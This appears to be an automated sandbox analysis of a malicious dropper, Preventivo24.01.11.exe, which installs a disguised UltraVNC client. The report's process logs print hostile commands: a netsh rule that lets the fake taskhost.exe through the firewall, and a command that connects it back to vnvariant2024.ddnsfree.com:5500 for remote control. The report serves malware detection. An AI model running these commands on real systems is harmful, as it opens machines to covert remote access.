Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle, 0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW, 0_2_00EA5220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose, 0_2_00FBD700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_01008B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_00FBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE3210 FindFirstFileW,FindClose, 0_2_00FE3210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose, 0_2_00F9F570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00FF3790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF3C10 FindFirstFileW,FindClose, 0_2_00FF3C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose, 0_2_00FCBFF0
Source: C:\Games\taskhost.exe Code function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose, 41_2_000BEC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 0_2_00FF2400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01087833 VirtualQuery,GetSystemInfo, 0_2_01087833
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\ Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ Jump to behavior
Source: viewer.exe, 0000002A.00000002.1871973925.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWCZ
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: , (Hyper-V Server)
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0108F843
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF6910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers, 0_2_00FF6910
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Games\taskhost.exe Code function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle, 41_2_000C57B0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_00FC0CA0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108A1CE mov esi, dword ptr fs:[00000030h] 0_2_0108A1CE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_010A4796 mov eax, dword ptr fs:[00000030h] 0_2_010A4796
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_010A47DA mov eax, dword ptr fs:[00000030h] 0_2_010A47DA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01095EA4 mov ecx, dword ptr fs:[00000030h] 0_2_01095EA4
Source: C:\Games\viewer.exe Code function: 6_2_0064B9CA mov eax, dword ptr fs:[00000030h] 6_2_0064B9CA
Source: C:\Games\viewer.exe Code function: 6_2_00643C84 mov eax, dword ptr fs:[00000030h] 6_2_00643C84
Source: C:\Games\taskhost.exe Code function: 41_2_001DC838 mov eax, dword ptr fs:[00000030h] 41_2_001DC838
Source: C:\Games\taskhost.exe Code function: 41_2_001CD615 mov ecx, dword ptr fs:[00000030h] 41_2_001CD615
Source: C:\Games\taskhost.exe Code function: 41_2_001DC7F4 mov eax, dword ptr fs:[00000030h] 41_2_001DC7F4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108A23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 0_2_0108A23A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EC2520 __set_se_translator,SetUnhandledExceptionFilter, 0_2_00EC2520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108ACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0108ACAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EC5180 __set_se_translator,SetUnhandledExceptionFilter, 0_2_00EC5180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0108F843
Source: C:\Games\viewer.exe Code function: 6_2_00635248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00635248
Source: C:\Games\viewer.exe Code function: 6_2_00639256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00639256
Source: C:\Games\viewer.exe Code function: 6_2_006353DE SetUnhandledExceptionFilter, 6_2_006353DE
Source: C:\Games\viewer.exe Code function: 6_2_006347F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_006347F5
Source: C:\Games\taskhost.exe Code function: 41_2_001BC87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_001BC87C
Source: C:\Games\taskhost.exe Code function: 41_2_001B8A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_001B8A67
Contains functionality to launch a program with higher privileges
Source: C:\Games\viewer.exe Code function: 6_2_00615210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop, 6_2_00615210
Creates a process in suspended mode (likely to inject code)
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi=" Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FB9280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification, 0_2_00FB9280
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.dr Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop
Contains functionality to query CPU information (cpuid)
Source: C:\Games\viewer.exe Code function: 6_2_00635448 cpuid 6_2_00635448
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 0_2_00FEB480
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 6_2_0064F04D
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_0064F173
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 6_2_0064F279
Source: C:\Games\viewer.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_0064F348
Source: C:\Games\viewer.exe Code function: GetLocaleInfoEx,___wcsnicmp_ascii, 6_2_0063433F
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 6_2_006483B3
Source: C:\Games\viewer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW, 6_2_0063440A
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 6_2_0064ECD4
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 6_2_0064EC89
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 6_2_0064ED6F
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_0064EDFA
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 6_2_00647E3A
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01003AD0 CreateNamedPipeW,CreateFileW, 0_2_01003AD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF6820 GetLocalTime, 0_2_00FF6820
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01002440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey, 0_2_01002440
Source: C:\Games\viewer.exe Code function: 6_2_00648AB4 _free,GetTimeZoneInformation, 6_2_00648AB4
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E87AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent, 0_2_00E87AA0

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the windows firewall
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality
barindex
Contains VNC / remote desktop functionality (version string found)
Source: taskhost.exe, 00000029.00000002.3497479719.0000000003A6D000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: RFB 003.008
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RFB 003.008
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1379424 Sample: Preventivo24.01.11.exe Startdate: 23/01/2024 Architecture: WINDOWS Score: 76 87 www.example.com 2->87 89 vnvariant2024.ddnsfree.com 2->89 103 Snort IDS alert for network traffic 2->103 105 Multi AV Scanner detection for submitted file 2->105 13 viewer.exe 1 2->13         started        15 Preventivo24.01.11.exe 73 2->15         started        signatures3 process4 dnsIp5 19 cmd.exe 3 3 13->19         started        95 www.example.com 93.184.216.34, 49729, 80 EDGECASTUS European Union 15->95 79 C:\Users\user\AppData\...\vnchooks.dll, PE32 15->79 dropped 81 C:\Users\user\AppData\Roaming\...\viewer.exe, PE32 15->81 dropped 83 C:\Users\user\AppData\...\taskhost.exe, PE32 15->83 dropped 85 6 other files (none is malicious) 15->85 dropped 22 msiexec.exe 2 15->22         started        file6 process7 signatures8 107 Uses cmd line tools excessively to alter registry or file data 19->107 109 Uses netsh to modify the Windows network and firewall settings 19->109 111 Modifies the windows firewall 19->111 24 viewer.exe 1 19->24         started        26 cmd.exe 1 19->26         started        29 Acrobat.exe 8 74 19->29         started        31 11 other processes 19->31 process9 signatures10 33 cmd.exe 24->33         started        119 Uses cmd line tools excessively to alter registry or file data 26->119 36 reg.exe 1 26->36         started        38 AcroCEF.exe 29->38         started        process11 